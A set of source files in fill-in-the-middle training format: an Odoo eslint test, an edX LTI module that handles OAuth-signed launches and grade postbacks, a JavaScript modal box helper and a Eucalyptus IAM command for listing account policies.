namespace.Modal = Modal; }(this);<|fim▁end|>
Modal.prototype.close = function close() { this._close(); };
<|file_name|>test_eslint.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. import logging import re import subprocess from unittest import skipIf from odoo import tools from . import lint_case RULES = ('{' '"no-undef": "error",' '"no-restricted-globals": ["error", "event", "self"],' '"no-const-assign": ["error"],' '"no-debugger": ["error"],' '"no-dupe-class-members": ["error"]' '}' ) PARSER_OPTIONS = '{ecmaVersion: 2019, sourceType: module}' GLOBAL = ','.join([ 'owl', 'odoo', '$', 'jQuery', '_', 'Chart', 'fuzzy', 'QWeb2', 'Popover', 'StackTrace', 'QUnit', 'luxon', 'moment', 'py', 'ClipboardJS', 'globalThis', ]) _logger = logging.getLogger(__name__) try: eslint = tools.misc.find_in_path('eslint') except IOError: eslint = None <|fim▁hole|>@skipIf(eslint is None, "eslint tool not found on this system") class TestESLint(lint_case.LintCase): longMessage = True def test_eslint_version(self): """ Test that there are no eslint errors in javascript files """ files_to_check = [ p for p in self.iter_module_files('**/static/**/*.js') if not re.match('.*/libs?/.*', p) # don't check libraries ] _logger.info('Testing %s js files', len(files_to_check)) # https://eslint.org/docs/user-guide/command-line-interface cmd = [eslint, '--no-eslintrc', '--env', 'browser', '--env', 'es2017', '--parser-options', PARSER_OPTIONS, '--rule', RULES, '--global', GLOBAL] + files_to_check process = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, check=False) self.assertEqual(process.returncode, 0, msg=process.stdout.decode())<|fim▁end|>
<|file_name|>lti_module.py<|end_file_name|><|fim▁begin|>""" Learning Tools Interoperability (LTI) module. Resources --------- Theoretical background and detailed specifications of LTI can be found on: http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html This module is based on the version 1.1.1 of the LTI specifications by the IMS Global authority. For authentication, it uses OAuth1. When responding back to the LTI tool provider, we must issue a correct response. Types of responses and their message payload is available at: Table A1.2 Interpretation of the 'CodeMajor/severity' matrix. http://www.imsglobal.org/gws/gwsv1p0/imsgws_wsdlBindv1p0.html A resource to test the LTI protocol (PHP realization): http://www.imsglobal.org/developers/LTI/test/v1p1/lms.php We have also begun to add support for LTI 1.2/2.0. We will keep this docstring in synch with what support is available. The first LTI 2.0 feature to be supported is the REST API results service, see specification at http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html What is supported: ------------------ 1.) Display of simple LTI in iframe or a new window. 2.) Multiple LTI components on a single page. 3.) The use of multiple LTI providers per course. 4.) Use of advanced LTI component that provides back a grade. A) LTI 1.1.1 XML endpoint a.) The LTI provider sends back a grade to a specified URL. b.) Currently only action "update" is supported. "Read", and "delete" actions initially weren't required. B) LTI 2.0 Result Service JSON REST endpoint (http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html) a.) Discovery of all such LTI http endpoints for a course. External tools GET from this discovery endpoint and receive URLs for interacting with individual grading units. (see lms/djangoapps/courseware/views.py:get_course_lti_endpoints) b.) GET, PUT and DELETE in LTI Result JSON binding (http://www.imsglobal.org/lti/ltiv2p0/mediatype/application/vnd/ims/lis/v2/result+json/index.html) for a provider to synchronize grades into edx-platform. Reading, Setting, and Deleteing Numeric grades between 0 and 1 and text + basic HTML feedback comments are supported, via GET / PUT / DELETE HTTP methods respectively """ import datetime from django.utils.timezone import UTC import logging import oauthlib.oauth1 from oauthlib.oauth1.rfc5849 import signature import hashlib import base64 import urllib import textwrap import bleach from lxml import etree from webob import Response import mock from xml.sax.saxutils import escape from xmodule.editing_module import MetadataOnlyEditingDescriptor from xmodule.raw_module import EmptyDataRawDescriptor from xmodule.x_module import XModule, module_attr from xmodule.course_module import CourseDescriptor from xmodule.lti_2_util import LTI20ModuleMixin, LTIError from pkg_resources import resource_string from xblock.core import String, Scope, List, XBlock from xblock.fields import Boolean, Float log = logging.getLogger(__name__) # Make '_' a no-op so we can scrape strings _ = lambda text: text DOCS_ANCHOR_TAG_OPEN = ( "<a target='_blank' " "href='http://edx.readthedocs.org/projects/ca/en/latest/exercises_tools/lti_component.html'>" ) class LTIFields(object): """ Fields to define and obtain LTI tool from provider are set here, except credentials, which should be set in course settings:: `lti_id` is id to connect tool with credentials in course settings. 
It should not contain :: (double semicolon) `launch_url` is launch URL of tool. `custom_parameters` are additional parameters to navigate to proper book and book page. For example, for Vitalsource provider, `launch_url` should be *https://bc-staging.vitalsource.com/books/book*, and to get to proper book and book page, you should set custom parameters as:: vbid=put_book_id_here book_location=page/put_page_number_here Default non-empty URL for `launch_url` is needed due to oauthlib demand (URL scheme should be presented):: https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136 """ display_name = String( display_name=_("Display Name"), help=_( "Enter the name that students see for this component. " "Analytics reports may also use the display name to identify this component." ), scope=Scope.settings, default="LTI", ) lti_id = String( display_name=_("LTI ID"), help=_( "Enter the LTI ID for the external LTI provider. " "This value must be the same LTI ID that you entered in the " "LTI Passports setting on the Advanced Settings page." "<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting." ).format( docs_anchor_open=DOCS_ANCHOR_TAG_OPEN, anchor_close="</a>" ), default='', scope=Scope.settings ) launch_url = String( display_name=_("LTI URL"), help=_( "Enter the URL of the external tool that this component launches. " "This setting is only used when Hide External Tool is set to False." "<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting." ).format( docs_anchor_open=DOCS_ANCHOR_TAG_OPEN, anchor_close="</a>" ), default='http://www.example.com', scope=Scope.settings) custom_parameters = List( display_name=_("Custom Parameters"), help=_( "Add the key/value pair for any custom parameters, such as the page your e-book should open to or " "the background color for this component." "<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting." ).format( docs_anchor_open=DOCS_ANCHOR_TAG_OPEN, anchor_close="</a>" ), scope=Scope.settings) open_in_a_new_page = Boolean( display_name=_("Open in New Page"), help=_( "Select True if you want students to click a link that opens the LTI tool in a new window. " "Select False if you want the LTI content to open in an IFrame in the current page. " "This setting is only used when Hide External Tool is set to False. " ), default=True, scope=Scope.settings ) has_score = Boolean( display_name=_("Scored"), help=_( "Select True if this component will receive a numerical score from the external LTI system." ), default=False, scope=Scope.settings ) weight = Float( display_name=_("Weight"), help=_( "Enter the number of points possible for this component. " "The default value is 1.0. " "This setting is only used when Scored is set to True." ), default=1.0, scope=Scope.settings, values={"min": 0}, ) module_score = Float( help=_("The score kept in the xblock KVS -- duplicate of the published score in django DB"), default=None, scope=Scope.user_state ) score_comment = String( help=_("Comment as returned from grader, LTI2.0 spec"), default="", scope=Scope.user_state ) hide_launch = Boolean( display_name=_("Hide External Tool"), help=_( "Select True if you want to use this component as a placeholder for syncing with an external grading " "system rather than launch an external tool. " "This setting hides the Launch button and any IFrames for this component." 
), default=False, scope=Scope.settings ) # Users will be presented with a message indicating that their e-mail/username would be sent to a third # party application. When "Open in New Page" is not selected, the tool automatically appears without any user action. ask_to_send_username = Boolean( display_name=_("Request user's username"), # Translators: This is used to request the user's username for a third party service. # Usernames can only be requested if "Open in New Page" is set to True. help=_( "Select True to request the user's username. You must also set Open in New Page to True to get the user's information." ), default=False, scope=Scope.settings ) ask_to_send_email = Boolean( display_name=_("Request user's email"), # Translators: This is used to request the user's email for a third party service. # Emails can only be requested if "Open in New Page" is set to True. help=_( "Select True to request the user's email address. You must also set Open in New Page to True to get the user's information." ), default=False, scope=Scope.settings ) description = String( display_name=_("LTI Application Information"), help=_( "Enter a description of the third party application. If requesting username and/or email, use this text box to inform users " "why their username and/or email will be forwarded to a third party application." ), default="", scope=Scope.settings ) button_text = String( display_name=_("Button Text"), help=_( "Enter the text on the button used to launch the third party application." ), default="", scope=Scope.settings ) accept_grades_past_due = Boolean( display_name=_("Accept grades past deadline"), help=_("Select True to allow third party systems to post grades past the deadline."), default=True, scope=Scope.settings ) class LTIModule(LTIFields, LTI20ModuleMixin, XModule): """ Module provides LTI integration to course. Except usual Xmodule structure it proceeds with OAuth signing. How it works:: 1. Get credentials from course settings. 2. There is minimal set of parameters need to be signed (presented for Vitalsource):: user_id oauth_callback lis_outcome_service_url lis_result_sourcedid launch_presentation_return_url lti_message_type lti_version roles *+ all custom parameters* These parameters should be encoded and signed by *OAuth1* together with `launch_url` and *POST* request type. 3. Signing proceeds with client key/secret pair obtained from course settings. That pair should be obtained from LTI provider and set into course settings by course author. After that signature and other OAuth data are generated. OAuth data which is generated after signing is usual:: oauth_callback oauth_nonce oauth_consumer_key oauth_signature_method oauth_timestamp oauth_version 4. All that data is passed to form and sent to LTI provider server by browser via autosubmit via JavaScript. 
Form example:: <form action="${launch_url}" name="ltiLaunchForm-${element_id}" class="ltiLaunchForm" method="post" target="ltiLaunchFrame-${element_id}" encType="application/x-www-form-urlencoded" > <input name="launch_presentation_return_url" value="" /> <input name="lis_outcome_service_url" value="" /> <input name="lis_result_sourcedid" value="" /> <input name="lti_message_type" value="basic-lti-launch-request" /> <input name="lti_version" value="LTI-1p0" /> <input name="oauth_callback" value="about:blank" /> <input name="oauth_consumer_key" value="${oauth_consumer_key}" /> <input name="oauth_nonce" value="${oauth_nonce}" /> <input name="oauth_signature_method" value="HMAC-SHA1" /> <input name="oauth_timestamp" value="${oauth_timestamp}" /> <input name="oauth_version" value="1.0" /> <input name="user_id" value="${user_id}" /> <input name="role" value="student" /> <input name="oauth_signature" value="${oauth_signature}" /> <input name="custom_1" value="${custom_param_1_value}" /> <input name="custom_2" value="${custom_param_2_value}" /> <input name="custom_..." value="${custom_param_..._value}" /> <input type="submit" value="Press to Launch" /> </form> 5. LTI provider has same secret key and it signs data string via *OAuth1* and compares signatures. If signatures are correct, LTI provider redirects iframe source to LTI tool web page, and LTI tool is rendered to iframe inside course. Otherwise error message from LTI provider is generated. """ js = { 'js': [ resource_string(__name__, 'js/src/lti/lti.js') ] } css = {'scss': [resource_string(__name__, 'css/lti/lti.scss')]} js_module_name = "LTI" def get_input_fields(self): # LTI provides a list of default parameters that might be passed as # part of the POST data. These parameters should not be prefixed. # Likewise, The creator of an LTI link can add custom key/value parameters # to a launch which are to be included with the launch of the LTI link. # In this case, we will automatically add `custom_` prefix before this parameters. # See http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html#_Toc316828520 PARAMETERS = [ "lti_message_type", "lti_version", "resource_link_title", "resource_link_description", "user_image", "lis_person_name_given", "lis_person_name_family", "lis_person_name_full", "lis_person_contact_email_primary", "lis_person_sourcedid", "role_scope_mentor", "context_type", "context_title", "context_label", "launch_presentation_locale", "launch_presentation_document_target", "launch_presentation_css_url", "launch_presentation_width", "launch_presentation_height", "launch_presentation_return_url", "tool_consumer_info_product_family_code", "tool_consumer_info_version", "tool_consumer_instance_guid", "tool_consumer_instance_name", "tool_consumer_instance_description", "tool_consumer_instance_url", "tool_consumer_instance_contact_email", ] client_key, client_secret = self.get_client_key_secret() # parsing custom parameters to dict custom_parameters = {} for custom_parameter in self.custom_parameters: try: param_name, param_value = [p.strip() for p in custom_parameter.split('=', 1)] except ValueError: _ = self.runtime.service(self, "i18n").ugettext msg = _('Could not parse custom parameter: {custom_parameter}. Should be "x=y" string.').format( custom_parameter="{0!r}".format(custom_parameter) ) raise LTIError(msg) # LTI specs: 'custom_' should be prepended before each custom parameter, as pointed in link above. 
if param_name not in PARAMETERS: param_name = 'custom_' + param_name custom_parameters[unicode(param_name)] = unicode(param_value) return self.oauth_params( custom_parameters, client_key, client_secret, ) def get_context(self): """ Returns a context. """ # use bleach defaults. see https://github.com/jsocol/bleach/blob/master/bleach/__init__.py # ALLOWED_TAGS are # ['a', 'abbr', 'acronym', 'b', 'blockquote', 'code', 'em', 'i', 'li', 'ol', 'strong', 'ul'] # # ALLOWED_ATTRIBUTES are # 'a': ['href', 'title'], # 'abbr': ['title'], # 'acronym': ['title'], # # This lets all plaintext through. sanitized_comment = bleach.clean(self.score_comment) return { 'input_fields': self.get_input_fields(), # These parameters do not participate in OAuth signing. 'launch_url': self.launch_url.strip(), 'element_id': self.location.html_id(), 'element_class': self.category, 'open_in_a_new_page': self.open_in_a_new_page, 'display_name': self.display_name, 'form_url': self.runtime.handler_url(self, 'preview_handler').rstrip('/?'), 'hide_launch': self.hide_launch, 'has_score': self.has_score, 'weight': self.weight, 'module_score': self.module_score, 'comment': sanitized_comment, 'description': self.description, 'ask_to_send_username': self.ask_to_send_username, 'ask_to_send_email': self.ask_to_send_email, 'button_text': self.button_text, 'accept_grades_past_due': self.accept_grades_past_due, } def get_html(self): """ Renders parameters to template. """ return self.system.render_template('lti.html', self.get_context()) @XBlock.handler def preview_handler(self, _, __): """ This is called to get context with new oauth params to iframe. """ template = self.system.render_template('lti_form.html', self.get_context()) return Response(template, content_type='text/html') def get_user_id(self): user_id = self.runtime.anonymous_student_id assert user_id is not None return unicode(urllib.quote(user_id)) def get_outcome_service_url(self, service_name="grade_handler"): """ Return URL for storing grades. To test LTI on sandbox we must use http scheme. While testing locally and on Jenkins, mock_lti_server use http.referer to obtain scheme, so it is ok to have http(s) anyway. The scheme logic is handled in lms/lib/xblock/runtime.py """ return self.runtime.handler_url(self, service_name, thirdparty=True).rstrip('/?') def get_resource_link_id(self): """ This is an opaque unique identifier that the TC guarantees will be unique within the TC for every placement of the link. If the tool / activity is placed multiple times in the same context, each of those placements will be distinct. This value will also change if the item is exported from one system or context and imported into another system or context. This parameter is required. Example: u'edx.org-i4x-2-3-lti-31de800015cf4afb973356dbe81496df' Hostname, edx.org, makes resource_link_id change on import to another system. Last part of location, location.name - 31de800015cf4afb973356dbe81496df, is random hash, updated by course_id, this makes resource_link_id unique inside single course. First part of location is tag-org-course-category, i4x-2-3-lti. Location.name itself does not change on import to another course, but org and course_id change. So together with org and course_id in a form of i4x-2-3-lti-31de800015cf4afb973356dbe81496df this part of resource_link_id: makes resource_link_id to be unique among courses inside same system. 
""" return unicode(urllib.quote("{}-{}".format(self.system.hostname, self.location.html_id()))) def get_lis_result_sourcedid(self): """ This field contains an identifier that indicates the LIS Result Identifier (if any) associated with this launch. This field identifies a unique row and column within the TC gradebook. This field is unique for every combination of context_id / resource_link_id / user_id. This value may change for a particular resource_link_id / user_id from one launch to the next. The TP should only retain the most recent value for this field for a particular resource_link_id / user_id. This field is generally optional, but is required for grading. """ return "{context}:{resource_link}:{user_id}".format( context=urllib.quote(self.context_id), resource_link=self.get_resource_link_id(), user_id=self.get_user_id() ) def get_course(self): """ Return course by course id. """ return self.descriptor.runtime.modulestore.get_course(self.course_id) @property def context_id(self): """ Return context_id. context_id is an opaque identifier that uniquely identifies the context (e.g., a course) that contains the link being launched. """ return self.course_id.to_deprecated_string() @property def role(self): """ Get system user role and convert it to LTI role. """ roles = { 'student': u'Student', 'staff': u'Administrator', 'instructor': u'Instructor', } return roles.get(self.system.get_user_role(), u'Student') def oauth_params(self, custom_parameters, client_key, client_secret): """ Signs request and returns signature and OAuth parameters. `custom_paramters` is dict of parsed `custom_parameter` field `client_key` and `client_secret` are LTI tool credentials. Also *anonymous student id* is passed to template and therefore to LTI provider. """ client = oauthlib.oauth1.Client( client_key=unicode(client_key), client_secret=unicode(client_secret) ) # Must have parameters for correct signing from LTI: body = { u'user_id': self.get_user_id(), u'oauth_callback': u'about:blank', u'launch_presentation_return_url': '', u'lti_message_type': u'basic-lti-launch-request', u'lti_version': 'LTI-1p0', u'roles': self.role, # Parameters required for grading: u'resource_link_id': self.get_resource_link_id(), u'lis_result_sourcedid': self.get_lis_result_sourcedid(), u'context_id': self.context_id, } if self.has_score: body.update({ u'lis_outcome_service_url': self.get_outcome_service_url() }) self.user_email = "" self.user_username = "" # Username and email can't be sent in studio mode, because the user object is not defined. # To test functionality test in LMS if callable(self.runtime.get_real_user): real_user_object = self.runtime.get_real_user(self.runtime.anonymous_student_id) try: self.user_email = real_user_object.email except AttributeError: self.user_email = "" try: self.user_username = real_user_object.username except AttributeError: self.user_username = "" if self.open_in_a_new_page: if self.ask_to_send_username and self.user_username: body["lis_person_sourcedid"] = self.user_username if self.ask_to_send_email and self.user_email: body["lis_person_contact_email_primary"] = self.user_email # Appending custom parameter for signing. body.update(custom_parameters) headers = { # This is needed for body encoding: 'Content-Type': 'application/x-www-form-urlencoded', } try: __, headers, __ = client.sign( unicode(self.launch_url.strip()), http_method=u'POST', body=body, headers=headers) except ValueError: # Scheme not in url. 
# https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136 # Stubbing headers for now: headers = { u'Content-Type': u'application/x-www-form-urlencoded', u'Authorization': u'OAuth oauth_nonce="80966668944732164491378916897", \ oauth_timestamp="1378916897", oauth_version="1.0", oauth_signature_method="HMAC-SHA1", \ oauth_consumer_key="", oauth_signature="frVp4JuvT1mVXlxktiAUjQ7%2F1cw%3D"'} params = headers['Authorization'] # Parse headers to pass to template as part of context: params = dict([param.strip().replace('"', '').split('=') for param in params.split(',')]) params[u'oauth_nonce'] = params[u'OAuth oauth_nonce'] del params[u'OAuth oauth_nonce'] # oauthlib encodes signature with # 'Content-Type': 'application/x-www-form-urlencoded' # so '='' becomes '%3D'. # We send form via browser, so browser will encode it again, # So we need to decode signature back: params[u'oauth_signature'] = urllib.unquote(params[u'oauth_signature']).decode('utf8') # Add LTI parameters to OAuth parameters for sending in form. params.update(body) return params def max_score(self): return self.weight if self.has_score else None @XBlock.handler def grade_handler(self, request, suffix): # pylint: disable=unused-argument """ This is called by courseware.module_render, to handle an AJAX call. Used only for grading. Returns XML response. Example of request body from LTI provider:: <?xml version = "1.0" encoding = "UTF-8"?> <imsx_POXEnvelopeRequest xmlns = "some_link (may be not required)"> <imsx_POXHeader> <imsx_POXRequestHeaderInfo> <imsx_version>V1.0</imsx_version> <imsx_messageIdentifier>528243ba5241b</imsx_messageIdentifier> </imsx_POXRequestHeaderInfo> </imsx_POXHeader> <imsx_POXBody> <replaceResultRequest> <resultRecord> <sourcedGUID> <sourcedId>feb-123-456-2929::28883</sourcedId> </sourcedGUID> <result> <resultScore> <language>en-us</language> <textString>0.4</textString> </resultScore> </result> </resultRecord> </replaceResultRequest> </imsx_POXBody> </imsx_POXEnvelopeRequest> Example of correct/incorrect answer XML body:: see response_xml_template. """ response_xml_template = textwrap.dedent("""\ <?xml version="1.0" encoding="UTF-8"?> <imsx_POXEnvelopeResponse xmlns = "http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0"> <imsx_POXHeader> <imsx_POXResponseHeaderInfo> <imsx_version>V1.0</imsx_version> <imsx_messageIdentifier>{imsx_messageIdentifier}</imsx_messageIdentifier> <imsx_statusInfo> <imsx_codeMajor>{imsx_codeMajor}</imsx_codeMajor> <imsx_severity>status</imsx_severity> <imsx_description>{imsx_description}</imsx_description> <imsx_messageRefIdentifier> </imsx_messageRefIdentifier> </imsx_statusInfo> </imsx_POXResponseHeaderInfo> </imsx_POXHeader> <imsx_POXBody>{response}</imsx_POXBody> </imsx_POXEnvelopeResponse> """) # Returns when `action` is unsupported. # Supported actions: # - replaceResultRequest. unsupported_values = { 'imsx_codeMajor': 'unsupported', 'imsx_description': 'Target does not support the requested operation.', 'imsx_messageIdentifier': 'unknown', 'response': '' } # Returns if: # - past due grades are not accepted and grade is past due # - score is out of range # - can't parse response from TP; # - can't verify OAuth signing or OAuth signing is incorrect. 
failure_values = { 'imsx_codeMajor': 'failure', 'imsx_description': 'The request has failed.',<|fim▁hole|> 'imsx_messageIdentifier': 'unknown', 'response': '' } if not self.accept_grades_past_due and self.is_past_due(): failure_values['imsx_description'] = "Grade is past due" return Response(response_xml_template.format(**failure_values), content_type="application/xml") try: imsx_messageIdentifier, sourcedId, score, action = self.parse_grade_xml_body(request.body) except Exception as e: error_message = "Request body XML parsing error: " + escape(e.message) log.debug("[LTI]: " + error_message) failure_values['imsx_description'] = error_message return Response(response_xml_template.format(**failure_values), content_type="application/xml") # Verify OAuth signing. try: self.verify_oauth_body_sign(request) except (ValueError, LTIError) as e: failure_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier) error_message = "OAuth verification error: " + escape(e.message) failure_values['imsx_description'] = error_message log.debug("[LTI]: " + error_message) return Response(response_xml_template.format(**failure_values), content_type="application/xml") real_user = self.system.get_real_user(urllib.unquote(sourcedId.split(':')[-1])) if not real_user: # that means we can't save to database, as we do not have real user id. failure_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier) failure_values['imsx_description'] = "User not found." return Response(response_xml_template.format(**failure_values), content_type="application/xml") if action == 'replaceResultRequest': self.set_user_module_score(real_user, score, self.max_score()) values = { 'imsx_codeMajor': 'success', 'imsx_description': 'Score for {sourced_id} is now {score}'.format(sourced_id=sourcedId, score=score), 'imsx_messageIdentifier': escape(imsx_messageIdentifier), 'response': '<replaceResultResponse/>' } log.debug("[LTI]: Grade is saved.") return Response(response_xml_template.format(**values), content_type="application/xml") unsupported_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier) log.debug("[LTI]: Incorrect action.") return Response(response_xml_template.format(**unsupported_values), content_type='application/xml') @classmethod def parse_grade_xml_body(cls, body): """ Parses XML from request.body and returns parsed data XML body should contain nsmap with namespace, that is specified in LTI specs. Returns tuple: imsx_messageIdentifier, sourcedId, score, action Raises Exception if can't parse. """ lti_spec_namespace = "http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0" namespaces = {'def': lti_spec_namespace} data = body.strip().encode('utf-8') parser = etree.XMLParser(ns_clean=True, recover=True, encoding='utf-8') root = etree.fromstring(data, parser=parser) imsx_messageIdentifier = root.xpath("//def:imsx_messageIdentifier", namespaces=namespaces)[0].text or '' sourcedId = root.xpath("//def:sourcedId", namespaces=namespaces)[0].text score = root.xpath("//def:textString", namespaces=namespaces)[0].text action = root.xpath("//def:imsx_POXBody", namespaces=namespaces)[0].getchildren()[0].tag.replace('{' + lti_spec_namespace + '}', '') # Raise exception if score is not float or not in range 0.0-1.0 regarding spec. 
score = float(score) if not 0 <= score <= 1: raise LTIError('score value outside the permitted range of 0-1.') return imsx_messageIdentifier, sourcedId, score, action def verify_oauth_body_sign(self, request, content_type='application/x-www-form-urlencoded'): """ Verify grade request from LTI provider using OAuth body signing. Uses http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html:: This specification extends the OAuth signature to include integrity checks on HTTP request bodies with content types other than application/x-www-form-urlencoded. Arguments: request: DjangoWebobRequest. Raises: LTIError if request is incorrect. """ client_key, client_secret = self.get_client_key_secret() headers = { 'Authorization': unicode(request.headers.get('Authorization')), 'Content-Type': content_type, } sha1 = hashlib.sha1() sha1.update(request.body) oauth_body_hash = base64.b64encode(sha1.digest()) oauth_params = signature.collect_parameters(headers=headers, exclude_oauth_signature=False) oauth_headers = dict(oauth_params) oauth_signature = oauth_headers.pop('oauth_signature') mock_request_lti_1 = mock.Mock( uri=unicode(urllib.unquote(self.get_outcome_service_url())), http_method=unicode(request.method), params=oauth_headers.items(), signature=oauth_signature ) mock_request_lti_2 = mock.Mock( uri=unicode(urllib.unquote(request.url)), http_method=unicode(request.method), params=oauth_headers.items(), signature=oauth_signature ) if oauth_body_hash != oauth_headers.get('oauth_body_hash'): log.error( "OAuth body hash verification failed, provided: {}, " "calculated: {}, for url: {}, body is: {}".format( oauth_headers.get('oauth_body_hash'), oauth_body_hash, self.get_outcome_service_url(), request.body ) ) raise LTIError("OAuth body hash verification is failed.") if (not signature.verify_hmac_sha1(mock_request_lti_1, client_secret) and not signature.verify_hmac_sha1(mock_request_lti_2, client_secret)): log.error("OAuth signature verification failed, for " "headers:{} url:{} method:{}".format( oauth_headers, self.get_outcome_service_url(), unicode(request.method) )) raise LTIError("OAuth signature verification has failed.") def get_client_key_secret(self): """ Obtains client_key and client_secret credentials from current course. """ course = self.get_course() for lti_passport in course.lti_passports: try: lti_id, key, secret = [i.strip() for i in lti_passport.split(':')] except ValueError: _ = self.runtime.service(self, "i18n").ugettext msg = _('Could not parse LTI passport: {lti_passport}. Should be "id:key:secret" string.').format( lti_passport='{0!r}'.format(lti_passport) ) raise LTIError(msg) if lti_id == self.lti_id.strip(): return key, secret return '', '' def is_past_due(self): """ Is it now past this problem's due date, including grace period? """ due_date = self.due # pylint: disable=no-member if self.graceperiod is not None and due_date: # pylint: disable=no-member close_date = due_date + self.graceperiod # pylint: disable=no-member else: close_date = due_date return close_date is not None and datetime.datetime.now(UTC()) > close_date class LTIDescriptor(LTIFields, MetadataOnlyEditingDescriptor, EmptyDataRawDescriptor): """ Descriptor for LTI Xmodule. 
""" module_class = LTIModule grade_handler = module_attr('grade_handler') preview_handler = module_attr('preview_handler') lti_2_0_result_rest_handler = module_attr('lti_2_0_result_rest_handler') clear_user_module_score = module_attr('clear_user_module_score') get_outcome_service_url = module_attr('get_outcome_service_url')<|fim▁end|>
<|file_name|>box.js<|end_file_name|><|fim▁begin|>/* eg: Box.show(div) */ var Box = { show: function (id) { var isIE = (document.all) ? true : false; var isIE6 = isIE && ( [/MSIE (\d)\.0/i.exec(navigator.userAgent)][0][1] == 6); var box = document.getElementById(id); if (!box) { return; } box.style.zIndex = "9999"; box.style.display = "block" box.style.position = !isIE6 ? "fixed" : "absolute"; box.style.top = box.style.left = "50%"; box.style.marginTop = -box.offsetHeight / 2 + "px"; box.style.marginLeft = -box.offsetWidth / 2 + "px"; var layer = document.getElementById("_box_layer"); if (!layer) { layer = document.createElement("div"); layer.id = "_box_layer"; layer.style.width = layer.style.height = "100%"; layer.style.position = !isIE6 ? "fixed" : "absolute"; layer.style.top = layer.style.left = 0; layer.style.backgroundColor = "#000"; layer.style.zIndex = "9998"; layer.style.opacity = "0.6"; document.body.appendChild(layer); } else { layer.style.display = ""; } var selects = document.getElementsByTagName("select"); if (selects) { for (var i = 0; i < selects.length; i++) { selects[i].style.visibility = "hidden"; } } function layer_iestyle() { layer.style.width = Math.max(document.documentElement.scrollWidth, document.documentElement.clientWidth) + "px"; layer.style.height = Math.max(document.documentElement.scrollHeight, document.documentElement.clientHeight) + "px"; }<|fim▁hole|> box.style.marginLeft = document.documentElement.scrollLeft - box.offsetWidth / 2 + "px"; } if (isIE) { layer.style.filter = "alpha(opacity=60)"; } if (isIE6) { layer_iestyle() box_iestyle(); window.attachEvent("onscroll", function () { box_iestyle(); }) window.attachEvent("onresize", layer_iestyle) } }, hide: function (id) { var box = document.getElementById(id); if (box) { box.style.display = "none"; } var layer = document.getElementById("_box_layer"); if (layer) { layer.style.display = "none"; } var selects = document.getElementsByTagName("select"); if (selects) { for (var i = 0; i < selects.length; i++) { selects[i].style.visibility = "visible"; } } } }<|fim▁end|>
function box_iestyle() { box.style.marginTop = document.documentElement.scrollTop - box.offsetHeight / 2 + "px";
<|file_name|>listaccountpolicies.py<|end_file_name|><|fim▁begin|># Copyright 2009-2015 Eucalyptus Systems, Inc. # # Redistribution and use of this software in source and binary forms, # with or without modification, are permitted provided that the following # conditions are met: # # Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from requestbuilder import Arg from requestbuilder.response import PaginatedResponse from euca2ools.commands.iam import IAMRequest, arg_account_name from euca2ools.commands.iam.getaccountpolicy import GetAccountPolicy<|fim▁hole|> class ListAccountPolicies(IAMRequest): DESCRIPTION = ('[Eucalyptus only] List one or all policies ' 'policies attached to an account') ARGS = [arg_account_name(help='''name or ID of the account owning the policies to list (required)'''), Arg('-p', '--policy-name', metavar='POLICY', route_to=None, help='display a specific policy'), Arg('-v', '--verbose', action='store_true', route_to=None, help='''display the contents of the resulting policies (in addition to their names)'''), Arg('--pretty-print', action='store_true', route_to=None, help='''when printing the contents of policies, reformat them for easier reading''')] LIST_TAGS = ['PolicyNames'] def main(self): return PaginatedResponse(self, (None,), ('PolicyNames',)) def prepare_for_page(self, page): # Pages are defined by markers self.params['Marker'] = page def get_next_page(self, response): if response.get('IsTruncated') == 'true': return response['Marker'] def print_result(self, result): if self.args.get('policy_name'): # Look for the specific policy the user asked for for policy_name in result.get('PolicyNames', []): if policy_name == self.args['policy_name']: if self.args['verbose']: self.print_policy(policy_name) else: print policy_name break else: for policy_name in result.get('PolicyNames', []): print policy_name if self.args['verbose']: self.print_policy(policy_name) def print_policy(self, policy_name): req = GetAccountPolicy( service=self.service, AccountName=self.args['AccountName'], PolicyName=policy_name, pretty_print=self.args['pretty_print']) response = req.main() req.print_result(response)<|fim▁end|>
